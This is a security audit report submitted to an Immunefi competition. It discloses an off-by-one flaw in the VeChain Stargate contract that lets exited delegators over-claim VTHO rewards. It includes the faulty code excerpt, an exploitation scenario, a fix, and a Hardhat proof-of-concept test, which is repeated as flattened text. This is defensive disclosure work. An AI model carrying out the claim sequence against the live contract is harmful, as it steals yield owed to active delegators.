59776 sc high exited delegators can over claim vtho rewards for post exit periods due to off by one error in claimabledelegationperiods

Submitted on Nov 15th 2025 at 17:38:20 UTC by @jayx for Audit Comp | Vechain | Stargate Hayabusa

Report ID: #59776
Report Type: Smart Contract
Report severity: High
Target: https://github.com/immunefi-team/audit-comp-vechain-stargate-hayabusa/tree/main/packages/contracts/contracts/Stargate.sol
Impacts: Theft of unclaimed yield

Description

Brief / Intro

The Stargate contract contains an off‑by‑one error in _claimableDelegationPeriods that allows users who have exited a delegation to continue claiming VTHO rewards for validator periods that occurred after their delegation ended.

When a delegation's endPeriod equals the user's next claimable period, the "ended" branch condition (endPeriod > nextClaimablePeriod) evaluates to false and the function falls through to the "active" branch, incorrectly returning the validator's latest completed period as the last claimable period. This lets ex‑delegators drain rewards that should remain in the pool for currently active delegators, resulting in theft of unclaimed yield and unfair distribution of protocol rewards.

Vulnerability Details

The root cause lies in the _claimableDelegationPeriods function of Stargate.sol.

Current implementation (relevant excerpt):

if (
    endPeriod != type(uint32).max &&
    endPeriod < currentValidatorPeriod &&
    endPeriod > nextClaimablePeriod  // ❌ Bug: Excludes equality case
) {
    return (nextClaimablePeriod, endPeriod);  // ✅ Correct cap at endPeriod
}

// Falls through to "active" branch
if (nextClaimablePeriod < currentValidatorPeriod) {
    return (nextClaimablePeriod, completedPeriods);  // ❌ Inflated: Includes post-exit periods
}

The problem is the strict inequality endPeriod > nextClaimablePeriod. Consider this scenario:

Step 1 — Initial state and first claim

A user delegates to a validator and claims rewards once, which advances lastClaimedPeriod to, say, period 3.

Step 2 — User requests exit

The user requests an exit, setting endPeriod to 4 (the period during which the exit was requested).

Step 3 — Validator continues validating

The validator completes periods 4, 5, 6, etc.

Step 4 — Next claim after exit

When claimRewards is called again:

nextClaimablePeriod = lastClaimedPeriod + 1 = 4
endPeriod = 4

The condition endPeriod > nextClaimablePeriod evaluates to 4 > 4 = false, so the "ended" branch is skipped.

Step 5 — Active branch incorrectly used

The function falls through to the "active" branch and returns lastClaimablePeriod = completedPeriods (e.g., 6). As a result, claimableDelegationPeriods returns (4, 6), exposing periods 4, 5, and 6 as claimable even though the delegation ended at period 4.

The correct condition should be endPeriod >= nextClaimablePeriod to ensure that when endPeriod equals nextClaimablePeriod, the function caps the window at endPeriod and does not expose later periods.

This bug is amplified because claimRewards calls _claimableDelegationPeriods internally, and the calculated window is used directly to compute VTHO transfers:

(uint32 firstClaimablePeriod, uint32 lastClaimablePeriod) = _claimableDelegationPeriods(tokenId);
...
for (uint32 period = firstClaimablePeriod; period <= lastClaimablePeriod; ++period) {
    rewards += _calculateRewardsForPeriod(...);
}

Since the loop iterates inclusive of lastClaimablePeriod, the inflated lastClaimablePeriod directly results in excess VTHO being transferred to the ex‑delegator.

Impact Details

This vulnerability enables theft of unclaimed yield from the protocol's VTHO reward pool, with these consequences:

Direct financial loss: Ex‑delegators can claim VTHO rewards for periods during which they were no longer delegating, stealing yield that should either remain in the pool or be distributed to currently active delegators. Over multiple periods and users, the drain can be significant.
Unfair reward distribution: Active delegators receive proportionally less reward because a portion of each period's rewards is being siphoned by ex‑delegators who are no longer participating. This breaks the protocol's economic guarantees.

References

https://github.com/immunefi-team/audit-comp-vechain-stargate-hayabusa/blob/e9c0bc9b0f24dc0c44de273181d9a99aaf2c31b0/packages/contracts/contracts/Stargate.sol#L916C8-L930C10

Proof of Concept

The test below reproduces the current (buggy) behavior. It performs delegation, claims once, requests exit, advances validator completed periods, and then observes that an ex‑delegator can still claim for periods after their endPeriod.

it("should allow an exited delegator to claim rewards for periods after endPeriod (BUG)", async () => {
    // 1. Stake and delegate
    const levelSpec = await stargateNFTMock.getLevel(LEVEL_ID);
    tx = await stargateContract.connect(user).stake(LEVEL_ID, {
        value: levelSpec.vetAmountRequiredToStake,
    });
    await tx.wait();

    const tokenId = await stargateNFTMock.getCurrentTokenId();

    // Delegate to validator
    tx = await stargateContract.connect(user).delegate(tokenId, validator.address);
    await tx.wait();

    // 2. Make delegation active: validator has completed some periods
    //    so that rewards start accumulating
    tx = await protocolStakerMock.helper__setValidationCompletedPeriods(
        validator.address,
        3 // completedPeriods = 3 => current validator period = 4
    );
    await tx.wait();

    // 3. Claim rewards once while delegation is still active.
    //    This advances lastClaimedPeriod inside Stargate for this token.
    tx = await stargateContract.connect(user).claimRewards(tokenId);
    await tx.wait();

    // 4. Request exit; this sets a finite endPeriod for the delegation.
    tx = await stargateContract.connect(user).requestDelegationExit(tokenId);
    await tx.wait();

    // 5. Advance validator further so completedPeriods > endPeriod,
    //    simulating the validator continuing to validate after user exit.
    tx = await protocolStakerMock.helper__setValidationCompletedPeriods(
        validator.address,
        6 // completedPeriods = 6 => current validator period = 7
    );
    await tx.wait();

    // 6. Read claimable periods for the ex-delegator.
    const [firstClaimablePeriod, lastClaimablePeriod] =
        await stargateContract.claimableDelegationPeriods(tokenId);

    // The *intended* behavior (per protocol team) is that an ex-delegator
    // should only be able to claim up to endPeriod and nothing after it.
    // However, the current implementation returns a window where
    // lastClaimablePeriod > firstClaimablePeriod (e.g. 6 > 4),
    // meaning the user can still claim rewards for periods after exit.
    //
    // This assertion encodes the CURRENT (buggy) behavior so the test passes
    // while clearly flagging it as a bug.
    expect(lastClaimablePeriod).to.be.gt(
        firstClaimablePeriod,
        "BUG: ex-delegator is allowed to claim rewards for periods after endPeriod"
    );
});

Suggested fix: change the condition to endPeriod >= nextClaimablePeriod so the delegation's endPeriod properly caps the claimable window when equal to nextClaimablePeriod.

Previous59756 sc high exiting delegators stakes can be bricked permanently by the validator signaling an exit after them in the same period Next59795 sc low free boosts for levels added after v3

Was this helpful?

it("should allow an exited delegator to claim rewards for periods after endPeriod (BUG)", async () => { // 1. Stake and delegate const levelSpec = await stargateNFTMock.getLevel(LEVEL_ID); tx = await stargateContract.connect(user).stake(LEVEL_ID, { value: levelSpec.vetAmountRequiredToStake, }); await tx.wait(); const tokenId = await stargateNFTMock.getCurrentTokenId(); // Delegate to validator tx = await stargateContract.connect(user).delegate(tokenId, validator.address); await tx.wait(); // 2. Make delegation active: validator has completed some periods // so that rewards start accumulating tx = await protocolStakerMock.helper__setValidationCompletedPeriods( validator.address, 3 // completedPeriods = 3 => current validator period = 4 ); await tx.wait(); // 3. Claim rewards once while delegation is still active. // This advances lastClaimedPeriod inside Stargate for this token. tx = await stargateContract.connect(user).claimRewards(tokenId); await tx.wait(); // 4. Request exit; this sets a finite endPeriod for the delegation. tx = await stargateContract.connect(user).requestDelegationExit(tokenId); await tx.wait(); // 5. Advance validator further so completedPeriods > endPeriod, // simulating the validator continuing to validate after user exit. tx = await protocolStakerMock.helper__setValidationCompletedPeriods( validator.address, 6 // completedPeriods = 6 => current validator period = 7 ); await tx.wait(); // 6. Read claimable periods for the ex-delegator. const [firstClaimablePeriod, lastClaimablePeriod] = await stargateContract.claimableDelegationPeriods(tokenId); // The *intended* behavior (per protocol team) is that an ex-delegator // should only be able to claim up to endPeriod and nothing after it. // However, the current implementation returns a window where // lastClaimablePeriod > firstClaimablePeriod (e.g. 6 > 4), // meaning the user can still claim rewards for periods after exit. // // This assertion encodes the CURRENT (buggy) behavior so the test passes // while clearly flagging it as a bug. expect(lastClaimablePeriod).to.be.gt( firstClaimablePeriod, "BUG: ex-delegator is allowed to claim rewards for periods after endPeriod" ); });

hashtagDescription

hashtagBrief / Intro

hashtagVulnerability Details

hashtagStep 1 — Initial state and first claim

hashtagStep 2 — User requests exit

hashtagStep 3 — Validator continues validating

hashtagStep 4 — Next claim after exit

hashtagStep 5 — Active branch incorrectly used

hashtagImpact Details

hashtagReferences

hashtagProof of Concept